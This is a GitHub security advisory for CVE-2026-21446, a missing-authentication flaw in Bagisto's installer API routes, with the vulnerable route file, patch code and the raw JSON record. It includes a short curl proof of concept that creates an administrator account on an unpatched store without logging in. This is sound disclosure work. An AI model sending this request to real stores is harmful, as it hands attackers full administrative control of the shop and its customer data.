ghsa-6h7w-v2xr-mqvw
Vulnerability from github
Published: 2026-01-02 21:14
Modified: 2026-01-03 00:32
Summary: Bagisto Missing Authentication on Installer API Endpoints
Details

### Vulnerable Code

**File:** `packages/Ibkul/Installer/src/Routes/Ib.php`

```
<?php

use Illuminate\Session\Middleware\StartSession;
use Illuminate\Support\Facades\Route;
use Ibkul\Installer\Http\Controllers\InstallerController;

Route::middleware(['Ib', 'installer_locale'])->group(function () {
    Route::controller(InstallerController::class)->group(function () {
        Route::get('install', 'index')->name('installer.index');

        Route::middleware(StartSession::class)->prefix('install/api')->group(function () {
            Route::post('env-file-setup', 'envFileSetup')->name('installer.env_file_setup');
            Route::post('run-migration', 'runMigration')->name('installer.run_migration')->withoutMiddleware('Ib');
            Route::post('run-seeder', 'runSeeder')->name('installer.run_seeder')->withoutMiddleware('Ib');
            Route::get('download-sample', 'downloadSample')->name('installer.download_sample')->withoutMiddleware('Ib');
            Route::post('admin-config-setup', 'adminConfigSetup')->name('installer.admin_config_setup')->withoutMiddleware('Ib');
            Route::post('sample-products-setup', 'createSampleProducts')->name('installer.sample_products_setup')->withoutMiddleware('Ib');
        });
    });
});
```

The API routes remain active even after the initial installation is complete, allowing any unauthenticated attacker to:

- Create admin accounts
- Modify application configuration
- Potentially overwrite existing data

The underlying **API endpoints** (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly.

### How to Reproduce

1. The Ib installer UI at `http://localhost:8000/install` has client-side protections.
2. **However, the API endpoints are directly exploitable:**
   - The attack works by calling `/install/api/admin-config-setup` directly via curl/HTTP client
   - No CSRF token, session, or authentication is required
   - The Ib UI workflow is completely bypassed

### Proof of Concept

```
#!/bin/bash
# PoC: Create admin account without authentication

TARGET="http://localhost:8000"

# Create a new admin account
curl -X POST "$TARGET/install/api/admin-config-setup" \
    -H "Content-Type: application/json" \
    -d '{
        "admin_name": "Attacker",
        "admin_email": "attacker@evil.com",
        "admin_password": "HackedPassword123"
    }'

echo ""
echo "New admin account created!"
echo "Login at: $TARGET/admin"
echo "Email: attacker@evil.com"
```

### Expected Result

The API should reject unauthenticated requests with a 401/403 status.

### Actual Result

The API accepts the request and creates a new admin account, allowing full administrative access to the e-commerce platform.

### Recommended Patch

Add an installation-completion check:

```
// In InstallerController.php or a new middleware

public function __construct()
{
    // Check if application is already installed
    if (file_exists(base_path('.env')) &&
        config('app.key') &&
        \Schema::hasTable('admins') &&
        \DB::table('admins')->count() > 0) {
        abort(404, 'Application already installed');
    }
}
```
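The recommended patch above packaged as a Laravel route middleware, as an added example that is not code from the advisory or from the Bagisto project (the project's actual fix is in the referenced commit). The class name `EnsureNotInstalled` and its namespace are assumptions that merely mirror the advisory's package path. What it adds over the constructor version is a caveat visible in the route file: the `/install/api/*` routes call `withoutMiddleware('Ib')`, so an install-state check folded into the `Ib` group would be stripped along with it; the check must be attached to the route group under its own class name.

```php
<?php

// Added example: hypothetical class and namespace, not the project's own fix.
namespace Ibkul\Installer\Http\Middleware;

use Closure;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Schema;
use Symfony\Component\HttpFoundation\Response;

/**
 * Blocks every installer route (the UI and /install/api/*) once the
 * application has been installed, using the same signals as the
 * advisory's recommended patch: .env present, app key set, and at
 * least one row in the admins table.
 */
class EnsureNotInstalled
{
    public function handle(Request $request, Closure $next): Response
    {
        if (self::isInstalled()) {
            // Same response as the recommended patch: the installer simply does not exist any more.
            abort(404, 'Application already installed');
        }

        return $next($request);
    }

    /** True once installation has completed; false (installer still allowed) otherwise. */
    public static function isInstalled(): bool
    {
        if (! file_exists(base_path('.env')) || ! config('app.key')) {
            return false;
        }

        try {
            return Schema::hasTable('admins') && DB::table('admins')->count() > 0;
        } catch (\Throwable $e) {
            // No usable database connection yet (mid-install): treat as not installed.
            return false;
        }
    }
}

// Registration in the routes file (Ib.php). The middleware is listed by class
// name next to the 'Ib' group, so the existing withoutMiddleware('Ib') calls on
// the API routes remove only the 'Ib' group and leave this check in place:
//
// Route::middleware([EnsureNotInstalled::class, 'Ib', 'installer_locale'])
//     ->group(function () { /* existing installer routes unchanged */ });
```

Because the check runs before the controller is resolved, it covers every route in the group, including `download-sample`, and a request that reaches a completed installation is answered before any installer logic executes. The `\Throwable` catch matters for the mid-install window, when `.env` may exist but the database connection is not yet usable; without it, the installer itself would fail with a 500 instead of proceeding.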


{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "bagisto/bagisto"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-21446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-02T21:14:06Z",
    "nvd_published_at": "2026-01-02T20:16:18Z",
    "severity": "HIGH"
  },
  "details": "### Vulnerable Code\n\n**File:** `packages/Ibkul/Installer/src/Routes/Ib.php`\n\n```\n\u003c?php\n\nuse Illuminate\\\\Session\\\\Middleware\\\\StartSession;  \nuse Illuminate\\\\Support\\\\Facades\\\\Route;  \nuse Ibkul\\\\Installer\\\\Http\\\\Controllers\\\\InstallerController;\n\nRoute::middleware(\\[\u0027Ib\u0027, \u0027installer\\_locale\u0027\\])-\\\u003egroup(function () {  \n    Route::controller(InstallerController::class)-\\\u003egroup(function () {  \n        Route::get(\u0027install\u0027, \u0027index\u0027)-\\\u003ename(\u0027installer.index\u0027);\n\n        Route::middleware(StartSession::class)-\\\u003eprefix(\u0027install/api\u0027)-\\\u003egroup(function () {  \n            Route::post(\u0027env-file-setup\u0027, \u0027envFileSetup\u0027)-\\\u003ename(\u0027installer.env\\_file\\_setup\u0027);  \n            Route::post(\u0027run-migration\u0027, \u0027runMigration\u0027)-\\\u003ename(\u0027installer.run\\_migration\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n            Route::post(\u0027run-seeder\u0027, \u0027runSeeder\u0027)-\\\u003ename(\u0027installer.run\\_seeder\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n            Route::get(\u0027download-sample\u0027, \u0027downloadSample\u0027)-\\\u003ename(\u0027installer.download\\_sample\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n            Route::post(\u0027admin-config-setup\u0027, \u0027adminConfigSetup\u0027)-\\\u003ename(\u0027installer.admin\\_config\\_setup\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n            Route::post(\u0027sample-products-setup\u0027, \u0027createSampleProducts\u0027)-\\\u003ename(\u0027installer.sample\\_products\\_setup\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n        });  \n    });  \n});\n```\n\nAPI routes remain active even after initial installation is complete, allowing any unauthenticated attacker to:\n\n- Create admin accounts  \n- Modify application configuration  \n- Potentially overwrite existing data\n\nthe underlying **API endpoints** (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly.\n\n### How to Reproduce\n\n1. The Ib installer UI at `http://localhost:8000/install` has client-side protections  \n2. **However, the API endpoints are directly exploitable:**  \n   - The attack works by calling `/install/api/admin-config-setup` directly via curl/HTTP client  \n   - No CSRF token, session, or authentication is required  \n   - The Ib UI workflow is completely bypassed\n\n### Proof of Concept\n\n```\n#!/bin/bash\n# PoC: Create admin account without authentication\n\n\nTARGET=\"http://localhost:8000\"\n\n\n# Create a new admin account\ncurl -X POST \"$TARGET/install/api/admin-config-setup\" \\\n    -H \"Content-Type: application/json\" \\\n    -d \u0027{\n        \"admin_name\": \"Attacker\",\n        \"admin_email\": \"attacker@evil.com\",\n        \"admin_password\": \"HackedPassword123\"\n    }\u0027\n\n\necho \"\"\necho \"New admin account created!\"\necho \"Login at: $TARGET/admin\"\necho \"Email: attacker@evil.com\"\n```\n\n### Expected Result\n\nThe API should reject unauthenticated requests with 401/403 status.\n\n### Actual Result\n\nThe API accepts the request and creates a new admin account, allowing full administrative access to the e-commerce platform.\n\n### Recommended Patch\n\nAdd installation completion check\n\n```\n// In InstallerController.php or a new middleware\n\n\npublic function __construct()\n{\n    // Check if application is already installed\n    if (file_exists(base_path(\u0027.env\u0027)) \u0026\u0026\n        config(\u0027app.key\u0027) \u0026\u0026\n        \\Schema::hasTable(\u0027admins\u0027) \u0026\u0026\n        \\DB::table(\u0027admins\u0027)-\u003ecount() \u003e 0) {\n        abort(404, \u0027Application already installed\u0027);\n    }\n}\n```",
  "id": "GHSA-6h7w-v2xr-mqvw",
  "modified": "2026-01-03T00:32:30Z",
  "published": "2026-01-02T21:14:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-6h7w-v2xr-mqvw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bagisto/bagisto/commit/380c045e48490da740cd505fb192cc45e1809bed"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bagisto/bagisto"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Bagisto Missing Authentication on Installer API Endpoints"
}